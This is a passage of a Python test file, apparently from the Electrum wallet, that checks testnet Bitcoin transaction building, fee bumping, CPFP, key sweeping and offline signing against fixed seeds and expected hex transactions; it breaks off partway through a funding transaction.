self.assertEqual((0, funding_output_value - 165000 - 5000 + 100000, 0), wallet1a.get_balance())
self.assertEqual((0, 165000 - 5000 - 100000, 0), wallet2a.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_between_p2sh_1of2_and_p2wpkh_p2sh(self, mock_write):
wallet1a = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('phone guilt ancient scan defy gasp off rotate approve ill word exchange', '', True),
keystore.from_xpub('tpubD6NzVbkrYhZ4YPZ3ntVjqSCxiUUv2jikrUBU73Q3iJ7Y8iR41oYf991L5fanv7ciHjbjokdK2bjYqg1BzEUDxucU9qM5WRdBiY738wmgLP4')
],
'1of2', gap_limit=2
)
# ^ second seed: kingdom now gift initial age right velvet exotic harbor enforce kingdom kick
wallet2 = WalletIntegrityHelper.create_standard_wallet(
# bip39: uniform tank success logic lesson awesome stove elegant regular desert drip device, der: m/49'/1'/0'
keystore.from_xprv('uprv91HGbrNZTK4x8u22nbdYGzEuWPxjaHMREUi7CNhY64KsG5ZGnVM99uCa16EMSfrnaPTFxjbRdBZ2WiBkokoM8anzAy3Vpc52o88WPkitnxi'),
gap_limit=2
)
# bootstrap wallet1
funding_tx = Transaction('010000000001027e20990282eb29588375ad04936e1e991af3bc5b9c6f1ab62eca8c25becaef6a01000000171600140e6a17fadc8bafba830f3467a889f6b211d69a00fdffffff51847fd6bcbdfd1d1ea2c2d95c2d8de1e34c5f2bd9493e88a96a4e229f564e800100000017160014ecdf9fa06856f9643b1a73144bc76c24c67774a6fdffffff021e8501000000000017a91451991bfa68fbcb1e28aa0b1e060b7d24003352e38700093d000000000017a914b0b9f31bace76cdfae2c14abc03e223403d7dc4b870247304402205e19721b92c6afd70cd932acb50815a36ee32ab46a934147d62f02c13aeacf4702207289c4a4131ef86e27058ff70b6cb6bf0e8e81c6cbab6dddd7b0a9bc732960e4012103fe504411c21f7663caa0bbf28931f03fae7e0def7bc54851e0194dfb1e2c85ef02483045022100e969b65096fba4f8b24eb5bc622d2282076241621f3efe922cc2067f7a8a6be702203ec4047dd2a71b9c83eb6a0875a6d66b4d65864637576c06ed029d3d1a8654b0012102bbc8100dca67ba0297aba51296a4184d714204a5fc2eda34708360f37019a3dccfcc1300')
funding_txid = funding_tx.txid()
funding_output_value = 4000000
self.assertEqual('1137c12de4ce0f5b08de8846ba14c0814351a7f0f31457c8ea51a5d4b3c891a3', funding_txid)
wallet1a.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# wallet1 -> wallet2
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet2.get_receiving_address(), 1000000)]
tx = wallet1a.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet1a.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet1a.is_mine(wallet1a.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('0100000001a391c8b3d4a551eac85714f3f0a7514381c014ba4688de085b0fcee42dc13711010000009200483045022100fcf03aeb97b66791372c18aa0dd651817cf458d941dd628c966f0305a023360f022016c534530e267b6a52f90e62aa9fb50ace609ffb21e472d3ba7b29db9b30050e014751210245c90e040d4f9d1fc136b3d4d6b7535bbb5df2bd27666c21977042cc1e05b5b02103c9a6bebfce6294488315e58137a279b2efe09f1f528ecf93b40675ded3cf0e5f52aefeffffff0240420f000000000017a9149573eb50f3136dff141ac304190f41c8becc92ce8738b32d000000000017a914b815d1b430ae9b632e3834ed537f7956325ee2a98700000000',
str(tx_copy))
self.assertEqual('1b7e94860b9681d4e371928d40fdbd4641e991aa74f1a211f239c887047e4a2a', tx_copy.txid())
self.assertEqual('1b7e94860b9681d4e371928d40fdbd4641e991aa74f1a211f239c887047e4a2a', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
wallet1a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet2 -> wallet1
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet1a.get_receiving_address(), 300000)]
tx = wallet2.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet2.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet2.is_mine(wallet2.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('010000000001012a4a7e0487c839f211a2f174aa91e94146bdfd408d9271e3d481960b86947e1b00000000171600149fad840ed174584ee054bd26f3e411817338c5edfeffffff02e09304000000000017a914b0b9f31bace76cdfae2c14abc03e223403d7dc4b87d89a0a000000000017a9148ccd0efb2be5b412c4033715f560ed8f446c8ceb87024830450221009c816c3e0c40b37085244f0976f65635b8d711952bad9843c5f51e386fd37cc402202c34a4a7227182742d9f93e9f28c4bd30ded6514550f39614cb5ad00e46690070121038362bbf0b4918b37e9d7c75930ed3a78e3d445724cb5c37ade4a59b6e411fe4e00000000',
str(tx_copy))
self.assertEqual('f65edb0843ff44436dc5964fb6b298e157502b9b4a83dac6b82dd2d2a3247d0a', tx_copy.txid())
self.assertEqual('63efc09db4c7445eaaca9a5e7732202f42aec81a53b05d819f1918ce0cf3b84d', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
wallet1a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet level checks
self.assertEqual((0, funding_output_value - 1000000 - 5000 + 300000, 0), wallet1a.get_balance())
self.assertEqual((0, 1000000 - 5000 - 300000, 0), wallet2.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bump_fee_p2pkh(self, mock_write):
wallet = self.create_standard_wallet_from_seed('fold object utility erase deputy output stadium feed stereo usage modify bean')
# bootstrap wallet
funding_tx = Transaction('010000000001011f4db0ecd81f4388db316bc16efb4e9daf874cf4950d54ecb4c0fb372433d68500000000171600143d57fd9e88ef0e70cddb0d8b75ef86698cab0d44fdffffff0280969800000000001976a91472e34cebab371967b038ce41d0e8fa1fb983795e88ac86a0ae020000000017a9149188bc82bdcae077060ebb4f02201b73c806edc887024830450221008e0725d531bd7dee4d8d38a0f921d7b1213e5b16c05312a80464ecc2b649598d0220596d309cf66d5f47cb3df558dbb43c5023a7796a80f5a88b023287e45a4db6b9012102c34d61ceafa8c216f01e05707672354f8119334610f7933a3f80dd7fb6290296bd391400')
funding_txid = funding_tx.txid()
funding_output_value = 10000000
self.assertEqual('03052739fcfa2ead5f8e57e26021b0c2c546bcd3d74c6e708d5046dc58d90762', funding_txid)
wallet.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, '2N1VTMMFb91SH9SNRAkT7z8otP5eZEct4KL', 2500000)]
coins = wallet.get_spendable_coins(domain=None, config=self.config)
tx = wallet.make_unsigned_transaction(coins, outputs, config=self.config, fixed_fee=5000)
tx.set_rbf(True)
tx.locktime = 1325501
wallet.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet.is_mine(wallet.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
self.assertEqual('01000000016207d958dc46508d706e4cd7d3bc46c5c2b02160e2578e5fad2efafc39270503000000006b483045022100df74e6a88085be1ff3a3fd96cf2ef03b5e33fa06788f56aa71649f0177d1bfc402206e36a7e6124863ac746d5288d6d47c1d1eac5d4ac3818e561a7a0f2c0a269429012102a807c07bd7975211078e916bdda061d97e98d59a3631a804aada2f9a3f5b587afdffffff02a02526000000000017a9145a71fc1a7a98ddd67be935ade1600981c0d066f987585d7200000000001976a914aab9af3fbee0ab4e5c00d53e92f66d4bcb44f1bd88acbd391400',
str(tx_copy))
self.assertEqual('44e6dd9529a253181112fc40cadd8ebb4c4359aacb91aa24c45556a1d00839b0', tx_copy.txid())
self.assertEqual('44e6dd9529a253181112fc40cadd8ebb4c4359aacb91aa24c45556a1d00839b0', tx_copy.wtxid())
wallet.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual((0, funding_output_value - 2500000 - 5000, 0), wallet.get_balance())
# bump tx
tx = wallet.bump_fee(tx=Transaction(tx.serialize()), delta=5000)
tx.locktime = 1325501
self.assertFalse(tx.is_complete())
wallet.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
tx_copy = Transaction(tx.serialize())
self.assertEqual('01000000016207d958dc46508d706e4cd7d3bc46c5c2b02160e2578e5fad2efafc39270503000000006a473044022055b7e6b7e89a55740f7aa2ad1ffcd4b5c913f0de63cf512438921534bc9c3a8d022043b3b27bdc2da4cc6265e4cc9673a3780ccd5cd6f0ee2eaedb51720c15b7a00a012102a807c07bd7975211078e916bdda061d97e98d59a3631a804aada2f9a3f5b587afdffffff02a02526000000000017a9145a71fc1a7a98ddd67be935ade1600981c0d066f987d0497200000000001976a914aab9af3fbee0ab4e5c00d53e92f66d4bcb44f1bd88acbd391400',
str(tx_copy))
self.assertEqual('f26edcf20991dccedf16058adbee923db7057c9b102db660156b8142b6a59bc7', tx_copy.txid())
self.assertEqual('f26edcf20991dccedf16058adbee923db7057c9b102db660156b8142b6a59bc7', tx_copy.wtxid())
wallet.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual((0, funding_output_value - 2500000 - 10000, 0), wallet.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_cpfp_p2pkh(self, mock_write):
wallet = self.create_standard_wallet_from_seed('fold object utility erase deputy output stadium feed stereo usage modify bean')
# bootstrap wallet
funding_tx = Transaction('010000000001010f40064d66d766144e17bb3276d96042fd5aee2196bcce7e415f839e55a83de800000000171600147b6d7c7763b9185b95f367cf28e4dc6d09441e73fdffffff02404b4c00000000001976a9141df43441a3a3ee563e560d3ddc7e07cc9f9c3cdb88ac009871000000000017a9143873281796131b1996d2f94ab265327ee5e9d6e28702473044022029c124e5a1e2c6fa12e45ccdbdddb45fec53f33b982389455b110fdb3fe4173102203b3b7656bca07e4eae3554900aa66200f46fec0af10e83daaa51d9e4e62a26f4012103c8f0460c245c954ef563df3b1743ea23b965f98b120497ac53bd6b8e8e9e0f9bbe391400')
funding_txid = funding_tx.txid()
funding_output_value = 5000000
self.assertEqual('9973bf8918afa349b63934432386f585613b51034db6c8628b61ba2feb8a3668', funding_txid)
wallet.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# cpfp tx
tx = wallet.cpfp(funding_tx, fee=50000)
tx.set_rbf(True)
tx.locktime = 1325502
wallet.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertEqual(tx.txid(), tx_copy.txid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
self.assertEqual('010000000168368aeb2fba618b62c8b64d03513b6185f58623433439b649a3af1889bf7399000000006a47304402203a0b369e46c5fbacb83044b7ab9d69ff7998774041d6870993504915bc495d210220272833b870d8abca516adb7dc4cb27892b1b6e4b52fbfeb592a72c3e795eb213012102a7536f0bfbc60c5a8e86e2b9df26431fc062f9f454016dbc26f2467e0bc98b3ffdffffff01f0874b00000000001976a9141df43441a3a3ee563e560d3ddc7e07cc9f9c3cdb88acbe391400',
str(tx_copy))
self.assertEqual('47500a425518b5542d94db1157f473b8cf322d31ea97a1a642fec19386cdb761', tx_copy.txid())
self.assertEqual('47500a425518b5542d94db1157f473b8cf322d31ea97a1a642fec19386cdb761', tx_copy.wtxid())
wallet.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual((0, funding_output_value - 50000, 0), wallet.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bump_fee_p2wpkh(self, mock_write):
wallet = self.create_standard_wallet_from_seed('frost repair depend effort salon ring foam oak cancel receive save usage')
# bootstrap wallet
funding_tx = Transaction('01000000000102acd6459dec7c3c51048eb112630da756f5d4cb4752b8d39aa325407ae0885cba020000001716001455c7f5e0631d8e6f5f05dddb9f676cec48845532fdffffffd146691ef6a207b682b13da5f2388b1f0d2a2022c8cfb8dc27b65434ec9ec8f701000000171600147b3be8a7ceaf15f57d7df2a3d216bc3c259e3225fdffffff02a9875b000000000017a914ea5a99f83e71d1c1dfc5d0370e9755567fe4a141878096980000000000160014d4ca56fcbad98fb4dcafdc573a75d6a6fffb09b702483045022100dde1ba0c9a2862a65791b8d91295a6603207fb79635935a67890506c214dd96d022046c6616642ef5971103c1db07ac014e63fa3b0e15c5729eacdd3e77fcb7d2086012103a72410f185401bb5b10aaa30989c272b554dc6d53bda6da85a76f662723421af024730440220033d0be8f74e782fbcec2b396647c7715d2356076b442423f23552b617062312022063c95cafdc6d52ccf55c8ee0f9ceb0f57afb41ea9076eb74fe633f59c50c6377012103b96a4954d834fbcfb2bbf8cf7de7dc2b28bc3d661c1557d1fd1db1bfc123a94abb391400')
funding_txid = funding_tx.txid()
funding_output_value = 10000000
self.assertEqual('52e669a20a26c8b3df5b41e5e6309b18bcde8e1ad7ea17a18f63b6dc6c8becc0', funding_txid)
wallet.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, '2N1VTMMFb91SH9SNRAkT7z8otP5eZEct4KL', 2500000)]
coins = wallet.get_spendable_coins(domain=None, config=self.config)
tx = wallet.make_unsigned_transaction(coins, outputs, config=self.config, fixed_fee=5000)
tx.set_rbf(True)
tx.locktime = 1325499
wallet.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet.is_mine(wallet.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
self.assertEqual('01000000000101c0ec8b6cdcb6638fa117ead71a8edebc189b30e6e5415bdfb3c8260aa269e6520100000000fdffffff02a02526000000000017a9145a71fc1a7a98ddd67be935ade1600981c0d066f987585d720000000000160014f0fe5c1867a174a12e70165e728a072619455ed50247304402205442705e988abe74bf391b293bb1b886674284a92ed0788c33024f9336d60aef022013a93049d3bed693254cd31a704d70bb988a36750f0b74d0a5b4d9e29c54ca9d0121028d4c44ca36d2c4bff3813df8d5d3c0278357521ecb892cd694c473c03970e4c5bb391400',
str(tx_copy))
self.assertEqual('b019bbad45a46ed25365e46e4cae6428fb12ae425977eb93011ffb294cb4977e', tx_copy.txid())
self.assertEqual('ba87313e2b3b42f1cc478843d4d53c72d6e06f6c66ac8cfbe2a59cdac2fd532d', tx_copy.wtxid())
wallet.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual((0, funding_output_value - 2500000 - 5000, 0), wallet.get_balance())
# bump tx
tx = wallet.bump_fee(tx=Transaction(tx.serialize()), delta=5000)
tx.locktime = 1325500
self.assertFalse(tx.is_complete())
wallet.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
tx_copy = Transaction(tx.serialize())
self.assertEqual('01000000000101c0ec8b6cdcb6638fa117ead71a8edebc189b30e6e5415bdfb3c8260aa269e6520100000000fdffffff02a02526000000000017a9145a71fc1a7a98ddd67be935ade1600981c0d066f987d049720000000000160014f0fe5c1867a174a12e70165e728a072619455ed5024730440220517fed3a902b5b41fa718ffd5f229b835b8ed26f23433c4ea437d24eff66d15b0220526854a6ebcd351ab2373d0e7c4e20f17c420520b5d570c2df7ca1d773d6a55d0121028d4c44ca36d2c4bff3813df8d5d3c0278357521ecb892cd694c473c03970e4c5bc391400',
str(tx_copy))
self.assertEqual('9a1c0ef7e871798b86074c7f8dd1e81b6d9a758ff07e0059eee31dc6fbf4f438', tx_copy.txid())
self.assertEqual('59144d30c911ac33359b0a32d5a3fdd2ca806982c85838e193eb95f5d315e813', tx_copy.wtxid())
wallet.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual((0, funding_output_value - 2500000 - 10000, 0), wallet.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_cpfp_p2wpkh(self, mock_write):
wallet = self.create_standard_wallet_from_seed('frost repair depend effort salon ring foam oak cancel receive save usage')
# bootstrap wallet
funding_tx = Transaction('01000000000101c0ec8b6cdcb6638fa117ead71a8edebc189b30e6e5415bdfb3c8260aa269e6520000000017160014ba9ca815474a674ff1efb3fc82cf0f3460de8c57fdffffff0230390f000000000017a9148b59abaca8215c0d4b18cbbf715550aa2b50c85b87404b4c000000000016001483c3bc7234f17a209cc5dcce14903b54ee4dab9002473044022038a05f7d38bcf810dfebb39f1feda5cc187da4cf5d6e56986957ddcccedc75d302203ab67ccf15431b4e2aeeab1582b9a5a7821e7ac4be8ebf512505dbfdc7e094fd0121032168234e0ba465b8cedc10173ea9391725c0f6d9fa517641af87926626a5144abd391400')
funding_txid = funding_tx.txid()
funding_output_value = 5000000
self.assertEqual('c36a6e1cd54df108e69574f70bc9b88dc13beddc70cfad9feb7f8f6593255d4a', funding_txid)
wallet.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# cpfp tx
tx = wallet.cpfp(funding_tx, fee=50000)
tx.set_rbf(True)
tx.locktime = 1325501
wallet.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertEqual(tx.txid(), tx_copy.txid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
self.assertEqual('010000000001014a5d2593658f7feb9fadcf70dced3bc18db8c90bf77495e608f14dd51c6e6ac30100000000fdffffff01f0874b000000000016001483c3bc7234f17a209cc5dcce14903b54ee4dab900248304502210098fbe458a9f1c595d6bf63962fad00300a7b60c6dd8b2e7625f3804a3bf1086602204bc8a46fb162be8f85a23644eccf9f4223fa092f5c861144676a34dc83a7c39d012102a6ff1ffc189b4776b78e20edca969cc45da3e610cc0cc79925604be43fee469fbd391400',
str(tx_copy))
self.assertEqual('38a21c67336232c88ae15311f329197c69ee70e872f8acb5bc9c2b6417c35ad8', tx_copy.txid())
self.assertEqual('b5b8264ed5f3e03d48ef82fa2a25278cd9c0563fa78e557f370b7e0558293172', tx_copy.wtxid())
wallet.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual((0, funding_output_value - 50000, 0), wallet.get_balance())
@needs_test_with_all_ecc_implementations
def test_sweep_p2pk(self):
class NetworkMock:
relay_fee = 1000
def get_local_height(self): return 1325785
def listunspent_for_scripthash(self, scripthash):
if scripthash == '460e4fb540b657d775d84ff4955c9b13bd954c2adc26a6b998331343f85b6a45':
return [{'tx_hash': 'ac24de8b58e826f60bd7b9ba31670bdfc3e8aedb2f28d0e91599d741569e3429', 'tx_pos': 1, 'height': 1325785, 'value': 1000000}]
else:
return []
privkeys = ['93NQ7CFbwTPyKDJLXe97jczw33fiLijam2SCZL3Uinz1NSbHrTu', ]
network = NetworkMock()
dest_addr = 'tb1q3ws2p0qjk5vrravv065xqlnkckvzcpclk79eu2'
tx = sweep(privkeys, network, config=None, recipient=dest_addr, fee=5000)
tx_copy = Transaction(tx.serialize())
self.assertEqual('010000000129349e5641d79915e9d0282fdbaee8c3df0b6731bab9d70bf626e8588bde24ac010000004847304402206bf0d0a93abae0d5873a62ebf277a5dd2f33837821e8b93e74d04e19d71b578002201a6d729bc159941ef5c4c9e5fe13ece9fc544351ba531b00f68ba549c8b38a9a01fdffffff01b82e0f00000000001600148ba0a0bc12b51831f58c7ea8607e76c5982c071fd93a1400',
str(tx_copy))
self.assertEqual('7f827fc5256c274fd1094eb7e020c8ded0baf820356f61aa4f14a9093b0ea0ee', tx_copy.txid())
self.assertEqual('7f827fc5256c274fd1094eb7e020c8ded0baf820356f61aa4f14a9093b0ea0ee', tx_copy.wtxid())
class TestWalletOfflineSigning(TestCaseForTestnet):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.electrum_path = tempfile.mkdtemp()
cls.config = SimpleConfig({'electrum_path': cls.electrum_path})
@classmethod
def tearDownClass(cls):
super().tearDownClass()
shutil.rmtree(cls.electrum_path)
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_xprv_online_xpub_p2pkh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_standard_wallet(
# bip39: "qwe", der: m/44'/1'/0'
keystore.from_xprv('tprv8gfKwjuAaqtHgqxMh1tosAQ28XvBMkcY5NeFRA3pZMpz6MR4H4YZ3MJM4fvNPnRKeXR1Td2vQGgjorNXfo94WvT5CYDsPAqjHxSn436G1Eu'),
gap_limit=4
)
wallet_online = WalletIntegrityHelper.create_standard_wallet(
keystore.from_xpub('tpubDDMN69wQjDZxaJz9afZQGa48hZS7X5oSegF2hg67yddNvqfpuTN9DqvDEp7YyVf7AzXnqBqHdLhzTAStHvsoMDDb8WoJQzNrcHgDJHVYgQF'),
gap_limit=4
)
# bootstrap wallet_online
funding_tx = Transaction('01000000000116e9c9dac2651672316aab3b9553257b6942c5f762c5d795776d9cfa504f183c000000000000fdffffff8085019852fada9da84b58dcf753d292dde314a19f5a5527f6588fa2566142130000000000fdffffffa4154a48db20ce538b28722a89c6b578bd5b5d60d6d7b52323976339e39405230000000000fdffffff0b5ef43f843a96364aebd708e25ea1bdcf2c7df7d0d995560b8b1be5f357b64f0100000000fdffffffd41dfe1199c76fdb3f20e9947ea31136d032d9da48c5e45d85c8f440e2351a510100000000fdffffff5bd015d17e4a1837b01c24ebb4a6b394e3da96a85442bd7dc6abddfbf16f20510000000000fdffffff13a3e7f80b1bd46e38f2abc9e2f335c18a4b0af1778133c7f1c3caae9504345c0200000000fdffffffdf4fc1ab21bca69d18544ddb10a913cd952dbc730ab3d236dd9471445ff405680100000000fdffffffe0424d78a30d5e60ac6b26e2274d7d6e7c6b78fe0b49bdc3ac4dd2147c9535750100000000fdffffff7ab6dd6b3c0d44b0fef0fdc9ab0ad6eee23eef799eee29c005d52bc4461998760000000000fdffffff48a77e5053a21acdf4f235ce00c82c9bc1704700f54d217f6a30704711b9737d0000000000fdffffff86918b39c1d9bb6f34d9b082182f73cedd15504331164dc2b186e95c568ccb870000000000fdffffff15a847356cbb44be67f345965bb3f2589e2fec1c9a0ada21fd28225dcc602e8f0100000000fdffffff9a2875297f81dfd3b77426d63f621db350c270cc28c634ad86b9969ee33ac6960000000000fdffffffd6eeb1d1833e00967083d1ab86fa5a2e44355bd613d9277135240fe6f60148a20100000000fdffffffd8a6e5a9b68a65ff88220ca33e36faf6f826ae8c5c8a13fe818a5e63828b68a40100000000fdffffff73aab8471f82092e45ed1b1afeffdb49ea1ec74ce4853f971812f6a72a7e85aa0000000000fdffffffacd6459dec7c3c51048eb112630da756f5d4cb4752b8d39aa325407ae0885cba0000000000fdffffff1eddd5e13bef1aba1ff151762b5860837daa9b39db1eae8ea8227c81a5a1c8ba0000000000fdffffff67a096ff7c343d39e96929798097f6d7a61156bbdb905fbe534ba36f273271d40100000000fdffffff109a671eb7daf6dcd07c0ceff99f2de65864ab36d64fb3a890bab951569adeee0100000000fdffffff4f1bdc64da8056d08f79db7f5348d1de55946e57aa7c8279499c703889b6e0fd0200000000fdffffff042f280000000000001600149c756aa33f4f89418b33872a973274b5445c727b80969800000000001600146c540c1c9f546004539f45318b8d9f4d7b4857ef80969800000000001976a91422a6daa4a7b695c8a2dd104d47c5dc73d655c96f88ac809698000000000017a914a6885437e0762013facbda93894202a0fe86e35f8702473044022075ef5f04d7a63347064938e15a0c74277a79e5c9d32a26e39e8a517a44d565cc022015246790fb5b29c9bf3eded1b95699b1635bcfc6d521886fddf1135ba1b988ec012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe02473044022061aa9b0d9649ffd7259bc54b35f678565dbbe11507d348dd8885522eaf1fa70c02202cc79de09e8e63e8d57fde6ef66c079ddac4d9828e1936a9db833d4c142615c3012103a8f58fc1f5625f18293403104874f2d38c9279f777e512570e4199c7d292b81b0247304402207744dc1ab0bf77c081b58540c4321d090c0a24a32742a361aa55ad86f0c7c24e02201a9b0dd78b63b495ab5a0b5b161c54cb085d70683c90e188bb4dc2e41e142f6601210361fb354f8259abfcbfbdda36b7cb4c3b05a3ca3d68dd391fd8376e920d93870d0247304402204803e423c321acc6c12cb0ebf196d2906842fdfed6de977cc78277052ee5f15002200634670c1dc25e6b1787a65d3e09c8e6bb0340238d90b9d98887e8fd53944e080121031104c60d027123bf8676bcaefaa66c001a0d3d379dc4a9492a567a9e1004452d02473044022050e4b5348d30011a22b6ae8b43921d29249d88ea71b1fbaa2d9c22dfdef58b7002201c5d5e143aa8835454f61b0742226ebf8cd466bcc2cdcb1f77b92e473d3b13190121030496b9d49aa8efece4f619876c60a77d2c0dc846390ecdc5d9acbfa1bb3128760247304402204d6a9b986e1a0e3473e8aef84b3eb7052442a76dfd7631e35377f141496a55490220131ab342853c01e31f111436f8461e28bc95883b871ca0e01b5f57146e79d7bb012103262ffbc88e25296056a3c65c880e3686297e07f360e6b80f1219d65b0900e84e02483045022100c8ffacf92efa1dddef7e858a241af7a80adcc2489bcc325195970733b1f35fac022076f40c26023a228041a9665c5290b9918d06f03b716e4d8f6d47e79121c7eb37012102d9ba7e02d7cd7dd24302f823b3114c99da21549c663f72440dc87e8ba412120902483045022100b55545d84e43d001bbc10a981f184e7d3b98a7ed6689863716cab053b3655a2f0220537eb76a695fbe86bf020b4b6f7ae93b506d778bbd0885f0a61067616a2c8bce0121034a57f2fa2c32c9246691f6a922fb1ebdf1468792bae7eff253a99fc9f2a5023902483045022100f1d4408463dbfe257f9f778d5e9c8cdb97c8b1d395dbd2e180bc08cad306492c022002a024e19e1a406eaa24467f033659de09ab58822987281e28bb6359288337bd012103e91daa18d924eea62011ce596e15b6d683975cf724ea5bf69a8e2022c26fc12f0247304402204f1e12b923872f396e5e1a3aa94b0b2e86b4ce448f4349a017631db26d7dff8a022069899a05de2ad2bbd8e0202c56ab1025a7db9a4998eea70744e3c367d2a7eb71012103b0eee86792dbef1d4a49bc4ea32d197c8c15d27e6e0c5c33e58e409e26d4a39a0247304402201787dacdb92e0df6ad90226649f0e8321287d0bd8fddc536a297dd19b5fc103e022001fe89300a76e5b46d0e3f7e39e0ee26cc83b71d59a2a5da1dd7b13350cd0c07012103afb1e43d7ec6b7999ef0f1093069e68fe1dfe5d73fc6cfb4f7a5022f7098758c02483045022100acc1212bba0fe4fcc6c3ae5cf8e25f221f140c8444d3c08dfc53a93630ac25da02203f12982847244bd9421ef340293f3a38d2ab5d028af60769e46fcc7d81312e7e012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe024830450221009c04934102402949484b21899271c3991c007b783b8efc85a3c3d24641ac7c24022006fb1895ce969d08a2cb29413e1a85427c7e85426f7a185108ca44b5a0328cb301210360248db4c7d7f76fe231998d2967104fee04df8d8da34f10101cc5523e82648c02483045022100b11fe61b393fa5dbe18ab98f65c249345b429b13f69ee2d1b1335725b24a0e73022010960cdc5565cbc81885c8ed95142435d3c202dfa5a3dc5f50f3914c106335ce0121029c878610c34c21381cda12f6f36ab88bf60f5f496c1b82c357b8ac448713e7b50247304402200ca080db069c15bbf98e1d4dff68d0aea51227ff5d17a8cf67ceae464c22bbb0022051e7331c0918cbb71bb2cef29ca62411454508a16180b0fb5df94248890840df0121028f0be0cde43ff047edbda42c91c37152449d69789eb812bb2e148e4f22472c0f0247304402201fefe258938a2c481d5a745ef3aa8d9f8124bbe7f1f8c693e2ddce4ddc9a927c02204049e0060889ede8fda975edf896c03782d71ba53feb51b04f5ae5897d7431dc012103946730b480f52a43218a9edce240e8b234790e21df5e96482703d81c3c19d3f1024730440220126a6a56dbe69af78d156626fc9cf41d6aac0c07b8b5f0f8491f68db5e89cb5002207ee6ed6f2f41da256f3c1e79679a3de6cf34cc08b940b82be14aefe7da031a6b012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe024730440220363204a1586d7f13c148295122cbf9ec7939685e3cadab81d6d9e921436d21b7022044626b8c2bd4aa7c167d74bc4e9eb9d0744e29ce0ad906d78e10d6d854f23d170121037fb9c51716739bb4c146857fab5a783372f72a65987d61f3b58c74360f4328dd0247304402207925a4c2a3a6b76e10558717ee28fcb8c6fde161b9dc6382239af9f372ace99902204a58e31ce0b4a4804a42d2224331289311ded2748062c92c8aca769e81417a4c012102e18a8c235b48e41ef98265a8e07fa005d2602b96d585a61ad67168d74e7391cb02483045022100bbfe060479174a8d846b5a897526003eb2220ba307a5fee6e1e8de3e4e8b38fd02206723857301d447f67ac98a5a5c2b80ef6820e98fae213db1720f93d91161803b01210386728e2ac3ecee15f58d0505